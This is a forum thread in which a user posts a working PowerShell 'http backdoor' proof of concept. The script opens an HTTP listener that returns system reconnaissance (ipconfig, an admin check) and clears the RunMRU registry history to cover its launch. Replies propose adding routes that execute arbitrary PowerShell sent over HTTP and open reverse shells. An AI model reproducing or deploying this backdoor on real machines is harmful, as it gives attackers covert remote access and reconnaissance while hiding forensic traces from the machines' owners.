Jump to content

powershell infiltration

jOte-

By jOte-
in Bash Bunny

Recommended Posts

jOte- Newbie

jOte-

Posted
Posted

############## powershell http backdoor...

$cHOST= 'localhost'; # '0.0.0.0' needs admin
$cPORT= 8080;

$URL = "http://$($cHOST):$($cPORT)/";

$ROUTES = @{
  "GET /exit" = { EXIT };
  "GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; 
  "GET /ipconfig" = { return "$(& ipconfig 2>&1 | Out-String)" };
  "GET /ipconfigall" = { return "$(& ipconfig /all 2>&1 | Out-String)" };
  "GET /trol/flipscreen" = { return "flipscreen" };
  "GET /trol/switchmousebuttons" = { return "switchmousebuttons" }
}

$LISTENER = New-Object System.Net.HttpListener;
$LISTENER.Prefixes.Add($URL);
$LISTENER.Start();

While ($LISTENER.IsListening) {
  If ($START -eq $null) {
    Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
    $START=1
  }
  $CONTEXT = $LISTENER.GetContext();
  $REQUEST = $CONTEXT.Request;
  $RESPONSE = $CONTEXT.Response;

  $RECEIVED = '{0} {1}' -f $REQUEST.httpMethod, $REQUEST.Url.LocalPath;
  
  $ROUTE = $ROUTES.Get_Item($RECEIVED);
  
  If ($ROUTE -eq $null) {
    $RESPONSE.StatusCode = 404;
  } Else {
    $CONTENT = & $($ROUTE);
    $CONTENT = "<pre>$($CONTENT)</pre>";
    $BUFFER = [System.Text.Encoding]::UTF8.GetBytes($CONTENT);
    $RESPONSE.ContentLength64 = $BUFFER.Length;
    $RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length);
  }
  $RESPONSE.Close();
}

Link to comment
Share on other sites
Dave-ee Jones Newbie

Dave-ee Jones

Posted
Posted
3 hours ago, jOte- said:

############## powershell http backdoor...

Looks interesting.

2 hours ago, jOte- said:

this is just a proof of concept... im not intending to send full scripts....

Okay.

1 hour ago, jOte- said:

some ppl will understand.... 

Yes.

1 hour ago, jOte- said:

BTW... who is that "thehappydinoanoob??? KIlling my entries with his stupid questions...

No idea.

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

Hmm, a dirty web server as a malicious service.  I been experimenting with using httplistener in Powershell as a PSJob to get payload jobs from.  Never thought about using it the way you use it because normally binding to a port in windows requires admin.  Do not know if that applies only to ports < 1024.

To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-)

 

Link to comment
Share on other sites
Dave-ee Jones Newbie

Dave-ee Jones

Posted
Posted
9 hours ago, PoSHMagiC0de said:

To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-)

On 3/27/2018 at 6:11 AM, jOte- said:

"GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; 

He has a URL to check for admin or not, however since I don't have the rest of his code I can't tell what else it's doing there.

I knew you would bring up psh. :P
If cmd, why not psh?

Having some other commands like.. 

GET /ispsh
GET /reversepsh
GET /sendpsh

even with a CLI tool on it would be interesting.

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

Of course, if it is psh, I may come a callin.  :-)

 

Actually what I meant for admin check was when running the backdoor it checks if it is being ran with enough permission to open the port.

 

That admin check he is using session for could be in powershell for more accurate results.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...